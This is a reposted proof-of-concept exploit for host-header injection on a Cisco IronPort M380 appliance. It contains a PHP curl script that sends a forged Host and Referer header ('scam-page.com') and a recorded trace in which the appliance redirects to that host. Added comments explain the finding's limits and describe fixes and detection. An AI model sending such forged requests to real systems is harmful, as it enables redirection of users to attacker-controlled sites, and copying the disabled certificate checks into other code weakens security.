
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019090075

Below is a copy:

Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification
<?php
//
//  Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit
//
//
//  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
//
//
//  Disclaimer:
//  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
//  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
//  caused by direct or indirect use of the  information or functionality provided by these programs. 
//  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
//  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
//  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
//  responsibility.
//   
//  Use them at your own risk!
//
//
//      [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php
//PHP <HIDDEN> Development Server started at Sun Sep  8 16:47:43 2019
//Listening on http://localhost:1337
//Document root is /home/test/ironport
//Press Ctrl-C to quit.
//* About to connect() to 192.168.1.1 port 443 (#0)
//*   Trying 192.168.1.1... * connected
//* Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
//* Initializing NSS with certpath: sql:/etc/pki/nssdb
//* skipping SSL peer certificate verification
//* SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
//* Server certificate:
//* subject: 
//* start date: Mar 19 00:00:00 2018 GMT
//* expire date: Mar 18 23:59:59 2020 GMT
//* common name:   
//* issuer: 
//> GET / HTTP/1.1
//Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
//Cache-Control: no-cache
//Content-Type: application/x-www-form-urlencoded; charset=utf-8
//Host: scam-page.com
//Referer: scam-page.com
//User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
//* HTTP 1.0, assume close after body
//< HTTP/1.0 303 Redirecting
//< Server: glass/1.0 Python/2.6.4
//< Date: Sun, 08 Sep 2019 13:47:59 GMT
//< Content-Type: text/html
//< X-Frame-Options: SAMEORIGIN
//< Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure
//< Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
//< Pragma: no-cache
//< Expires: Sun, 08 Sep 2019 13:47:59 GMT
//< Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT
//< Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch
//< 
//* Closing connection #0
//* About to connect() to 192.168.1.1 port 443 (#0)
//*   Trying 192.168.1.1... * connected
//* Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
//* skipping SSL peer certificate verification
//* SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
//* Server certificate:
//* subject: 
//* start date: Mar 19 00:00:00 2018 GMT
//* expire date: Mar 18 23:59:59 2020 GMT
//* common name:   
//* issuer: 
//> GET / HTTP/1.1
//Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
//Cache-Control: no-cache
//Content-Type: application/x-www-form-urlencoded; charset=utf-8
//Host: scam-page.com
//Referer: scam-page.com
//User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
//* HTTP 1.0, assume close after body
//< HTTP/1.0 303 Redirecting
//< Server: glass/1.0 Python/2.6.4
//< Date: Sun, 08 Sep 2019 13:48:00 GMT
//< Content-Type: text/html
//< X-Frame-Options: SAMEORIGIN
//< Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure
//< Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
//< Pragma: no-cache
//< Expires: Sun, 08 Sep 2019 13:48:00 GMT
//< Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT
//< Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch
//< 
//* Closing connection #0
//


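// Demo request for the behaviour recorded in the transcript above: the
// appliance answers GET / with a 303 whose Location header carries the
// hostname supplied by the client rather than the appliance's own name.
//
// Notes for anyone triaging this finding:
//  - Host and Referer are both set to the same value below, so the transcript
//    alone does not show which of the two the server copies into Location;
//    the advisory title attributes it to Host.
//  - The request only proves that the value is reflected to the client that
//    sent it. Whether a third party can be affected depends on something in
//    between (for example a shared cache, or links generated the same way);
//    nothing on this page demonstrates that step.
//  - The fix belongs on the server side: accept only the configured hostnames
//    in Host and build absolute redirect URLs from configuration, not from the
//    request. A reverse proxy that rejects unknown Host values is a stopgap.
//  - For detection, log requests whose Host is not one of the appliance's
//    names and redirects whose Location leaves the expected domain.

$url = "https://192.168.1.1";    // lab address of the appliance under test
$fake_host = "scam-page.com";    // stand-in hostname that the response should NOT echo back
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
// Return the body as a string instead of printing it straight away.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Certificate checks are switched off because the lab appliance presents a
// certificate with an empty subject (see transcript). Lab use only: do not
// carry these two settings into any other client code.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
// The verbose trace is where the response headers, including Location,
// become visible; CURLOPT_HEADER is not set, so $output holds the body only.
curl_setopt($ch, CURLOPT_VERBOSE, true);
$headers = [
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    // NOTE(review): the recorded transcript shows "Cache-Control: no-cache",
    // so it was not produced by exactly this header list.
    'Cache-Control: public',
    'Content-Type: application/x-www-form-urlencoded; charset=utf-8',
    'Host: '.$fake_host,
    'Referer: '.$fake_host,
    'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$output = curl_exec($ch);
if ($output === false) {
    // A failed transfer used to print an empty page, which is easy to misread
    // as "no reflection". Report the transport error instead.
    error_log('Request to '.$url.' failed: '.curl_error($ch));
} else {
    echo $output;
}
curl_close($ch);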
